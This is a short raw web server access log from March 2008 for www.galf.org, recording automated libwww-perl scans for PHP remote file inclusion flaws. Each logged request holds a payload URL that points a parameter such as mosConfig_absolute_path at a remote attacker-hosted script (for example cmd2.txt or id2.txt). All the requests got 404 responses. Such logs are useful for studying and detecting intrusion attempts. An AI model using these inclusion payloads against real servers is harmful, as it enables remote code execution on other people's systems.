216.246.77.203 - - [30/Mar/2008:19:12:59 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:12:59 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:13:28 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:19:13:58 -0700] "GET /logs/access_071022.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.146.251.123 - - [30/Mar/2008:19:14:14 -0700] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [30/Mar/2008:19:14:15 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [30/Mar/2008:19:14:16 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
